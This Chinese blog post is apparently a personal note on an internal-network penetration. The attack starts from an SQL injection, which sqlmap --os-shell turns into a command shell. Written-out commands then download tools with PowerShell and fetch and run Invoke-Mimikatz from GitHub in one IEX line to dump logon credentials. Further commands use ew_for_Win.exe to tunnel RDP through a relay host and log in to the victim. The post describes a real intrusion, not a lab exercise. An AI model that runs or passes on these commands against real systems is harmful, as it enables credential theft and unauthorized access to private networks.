内网渗透笔记

最新推荐文章于 2024-08-01 11:00:00 发布
最新推荐文章于 2024-08-01 11:00:00 发布
阅读量489 收藏 2
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011975363/article/details/84866575
版权

读万卷书不如行万里路,之前对网上的内网渗透的博客,一知半解,今天终于体验了一回。
因为自己不是主力,所以对有些过程,还不清楚,利用此博客,把今天学到的记录下来,作为笔记。

切入点

目标网站存在sql 注入

  • 利用sqlmap -u "url" --os-shell 进入该网站的cmd界面。
  • 利用powershell上传工具。
    由于进入的服务为 windows 8版本,没有powershell,所以可以采用 将可在powershell运行的命令前加 powershell
  • 比如 在powershell 中,下载文件的命令为:
    (1) $client = new-object System.Net.WebClient
    (2) $client.DownloadFile('#1', '#2')
    #1是需要下载文件的url
    #2是保存为本地文件的路径,包括文件名.
  • 在cmd 中要实现此功能则应输入:
    (1) powershell $client = new-object System.Net.WebClient
    (2) powershell $client.DownloadFile('#1', '#2')
  • 或者使用powershell echo 一行一行的写入,这个步骤我不是很清楚,后续补上。
  • 将转发端口所需要的工具传到进入的服务器主机中,本来想在该服务器上找到网站所在目录,传webshell但是找了很久都没找到,后面才发现,该服务器为数据库服务器,网站放在另一个服务器。

查看登录密码

  • 在进入的cmd 环境中输入:powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" 即可看到服务管理员所属的域及对应主机登录密码

利用跳板机登录靶机

由于已经上传了工具到靶机,利用自己的一台服务器作为跳板机。
假设我们的服务器IP为:IP1 ,靶机的IP:IP2

  • 在跳板机上cmd 中输入命令:ew_for_Win.exe -s lcx_listen -l 1080 -e 1234 ew_for_Win.exe为我们上传的工具,该命令的意思为: 监听1234端口的流量,并将该端口的流量转发到 本机1080端口上。
  • 在靶机的cmd中输入命令:ew_for_Win.exe -s lcx_slave -d IP1 -e 1234 -f IP2 -g 3389
    该命令的意思为:将靶机3389(远程桌面连接)的流量转发到1234端口。
注意这台数据库服务器,既可以访问外网又可以访问内网。

经过这两步操作后,靶机远程桌面3389的流量就映射到跳板机的1080端口上,在跳板机上cmd中输入mstsc ,进入远程连接,输入:IP1:1080即可连接上靶机,输入前面获得的用户名,密码即可成功登录到靶机。

参考博客

小心灵呀
关注
专栏目录
网络渗透笔记
weixin_67832238的博客
03-08 4723
第一章 渗透测试之信息收集 进行渗透测试之前,最重要的一步就是信息收集,在这个阶段,我们要尽可能地收集目标组织的信息。在信息收集中,追主要的就是收集服务器的配置信息和网站的敏感信息,其中包括域名与子域名信息、目标网站系统、CMS指纹、目标网站真实IP、开放的端口等。 1.1收集域名信息 知道域名信息后,我们要做的第一件事就是获取域名的注册信息,包括该域名的DNS服务器信息和注册人的联系信息等。 域名信息收集的常用方法? 1.1.1 Whois查询 whois是一个标准的互联网协议,可用于收集网络
内网渗透笔记——vulnhub内网结课渗透
wang_zui_zui的博客
03-14 751
准备步骤: 靶机:Beelzebub ip地址:192.168.111.136 攻击机:kali ip地址:192.168.111.130 Vmware下NAT模式连接 一、进行信息收集 1、使用nmap命令扫网段 发现目标ip——192.168.111.136 2、对目标ip进行详细的扫描 发现开放了22和80两个端口,考虑能不能通过爆破22号端口来取得shell? 3.尝试爆破 利用user&pass.txt字典,为了防止电脑跑烂掉选择admin,user等较常用
内网渗透测试工具:零基础入门到精通(超详细),收藏这一篇就够了
最新发布
xiaoganbuaiuk的博客
08-01 550
网络扫描工具,用于扫描IP地址、端口、操作系统等信息。
浅谈内网渗透
crystal0011的专栏
06-15 806
转自:freebuf.com 引子 离上篇文章的时间过去很久了,答应写一篇内网渗透的文章,今天抽点时间,把这个坑给添平了吧。标题是浅谈,所以我不认为自己能在内网渗透写的有多深入。渗透这玩意更多是经验,积累的多了自然水到渠成。而且我个人认为很多前辈人物都已经写的很好了,我这里纯粹抛砖引玉,把前辈级人物的经验集成在一起,也算基础篇吧。如果有不足的地方或者有更好的实现方法,欢迎随时交流。交流方式就以
web渗透笔记
weixin_30375427的博客
12-11 169
1、安装nmap记录:(1)下载:wgethttp://nmap.org/dist/nmap-6.46.tar.bz2(最新版)wgethttp://nmap.org/dist/nmap-6.00.tgz(稳定版)(2)解压tar -zxvf nmap-6.00.tar.bz2;mv nmap-6.00 nmap或tar -jxvf nmap-6.46.tar.bz2;mv nmap-6.46...
内网渗透笔记,课堂资料
03-11
这篇“内网渗透笔记,课堂资料”提供了一套系统性的学习资源,帮助读者了解和掌握内网渗透的相关知识。 一、内网渗透基础 内网渗透涉及到多个步骤,首先需要进行信息收集。这包括但不限于DNS查询、SNMP扫描、端口...
内网渗透思路整理与工具使用
12-08
内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用
CTF内网渗透笔记
qq_26579613的博客
11-10 3965
一、漏洞挖掘相关工具的使用 NMAP扫描工具使用 1.扫描指定的IP范围 nmap 192.168.0.101-110 2.扫描指定的IP网段 nmap 192.168.0.* --exclude 192.168.0.100 3.扫描指定网址的操作系统类型(深度扫描) nmap -A 192.168.0.101 or nmap -O 192.168.0.101 4.扫描网络内活跃的主机(该命令会跳过端口扫描或检测) nmap -sP 192.168.0.* 5.快速扫描主
红日安全内网渗透笔记
VB551的博客
04-10 4732
靶场下载地址:漏洞详情 环境配置参考:【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园 此实战仅有3台机器 DMZ区的WEB机 、核心区的AD机、办公区的PC 第一步:信息收集 已知WEB机的IP地址,用syn包进行扫描。 nmap -sS -v 192.168.111.80 获得端口开放 ...
内网渗透----------笔记
tell_me_404的博客
04-01 211
前提:已经进到内网服务器 一、信息收集 主机内部收集 1、ip:ipconfig/all 2、进程收集:tasklist 3、端口:netstat -an 4、服务:services.msc 5、软件安装:查看默认安装目录 6、文件目录:查看系统的一些文件或目录 7、共享缓存:\1 会出来提示信息 8、cookie:查看浏览器cookie缓存 9、远程桌面登陆缓存 10、ftp登陆缓存 11、软件...
渗透测试-内网渗透笔记
weixin_34092370的博客
12-11 106
端口转发 一、lcx 的使用 1. 肉鸡上执行:lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口 例如:lcx.exe -slave xxx.xxx.xxx.xxx 10001 127.0.0.1 3389 意思是把肉鸡的 3389 端口转发到 xxx.xxx.xxx.xxx 公网的 10001 端口 2. 公网 ip 机器上执行 lcx.exe –liste...
渗透笔记
时光途径
06-11 3392
0x00 前言 本实验是一次非常深入彻底的模拟渗透,虽然只针对一台服务器,但却经历了从最初的获取网站管理员账号密码,到获得网站的 webshell,最后到通过提权获得服务器系统最高权限的完整渗透过程。 从实验手册上给出的工具提示也能看出,本次渗透会用到目录扫描工具、注入工具、getshell 工具、提权工具等,可谓干货满满。若各位能亲自动手尝试所有能用到的工具,把整个渗透流程实现一遍,所有知识...
内网渗透测试笔记
Innocence_0的博客
08-21 136
DNS**请求就会落到我们提前搭建好的恶意DNS服务器上[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3rNb7TFN-1692615254929)(https://image.3001.net/images/20211006/1633510163_615d63137a263652da1f8.png!small)]
MSF 内网渗透笔记
07-03 887
MSF 内网渗透笔记   进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_D...
内网渗透自己的笔记
xingxingdoukeyi的博客
10-22 272
拿到shell进入内网后虽然ms17010横行但也是不能拿着扫描器到处扫的,每一步都应该小心谨慎 首先在下认为应该判断是否为虚拟机,docker,蜜獾等 docker通常会有一些命令not find例如ifconfig uname-a 等 如果打着四面漏风的系统多半就是蜜獾了,而且里面没有正经的办公痕迹的也很可疑 vm虚拟机为运行xchg ecx,eax 时间大于0xFF时可以确定 //使用如下命令判断docker ls -alh ./dockerenv cat /proc/1/cgroup //没有i
内网渗透之学习笔记
shy的博客
08-31 734
1,windows下找网站路径 访问网站,找一个网站上拥有的文件,然后使用dir /s /b进行搜索 dir /s /b c:\checkform.js /S 显示指定目录和所有子目录中的文件。 /B 使用空格式(没有标题信息或摘要)。(对于文件来说,只显示文件名和扩展名,这一条比较实用!) 2、判断是否存在站库分离 3,制作DNS Beacon 准备一台VPS服务器(可以直接使用我们的CS服务器),该机器的53端口一定要对外开放。然后准备好...
Linux内网渗透:反弹shell技术详解
"这份学习笔记整合了多种反弹shell的方法,包括bash反弹、telnet反弹和nc反弹,主要面向网络安全和内网渗透领域的学习者。内容详尽地介绍了各种反弹shell的命令行操作,适用于Linux环境,并提醒注意不同发行版可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值